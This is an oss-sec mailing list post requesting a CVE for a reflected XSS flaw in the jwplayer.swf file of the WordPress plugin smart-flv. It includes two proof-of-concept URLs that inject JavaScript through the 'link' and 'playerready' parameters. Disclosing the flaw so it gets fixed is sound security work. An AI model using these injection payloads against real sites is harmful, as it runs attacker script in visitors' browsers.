oss-sec mailing list archives
CVE request: WordPress plugin smart-flv jwplayer.swf XSS
From: Henri Salo <henri () nerv fi>
Date: Mon, 25 Feb 2013 00:23:59 +0200
Hello list, With wpscan-team I noticed that file jwplayer.swf in WordPress plugin smart-flv is vulnerable to reflected XSS vulnerability. URL: http://wordpress.org/extend/plugins/smart-flv/ 416d0313c5f286c3a8e9daff520a9f44439b93f7 http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf With user interaction (clicking the page): https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link No interaction: https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29 WordPress guys could you report this to the developer since I don't know his/her email address, thanks? Could you also tell me if there is a way to contact plugin developers directly, thank you. Please include CVE to changelog if possible. -- Henri Salo ps. http://paste.nerv.fi/36167527-horse.jpeg
Current thread:
- CVE request: WordPress plugin smart-flv jwplayer.swf XSS Henri Salo (Feb 24)
- Re: CVE request: WordPress plugin smart-flv jwplayer.swf XSS Kurt Seifried (Feb 25)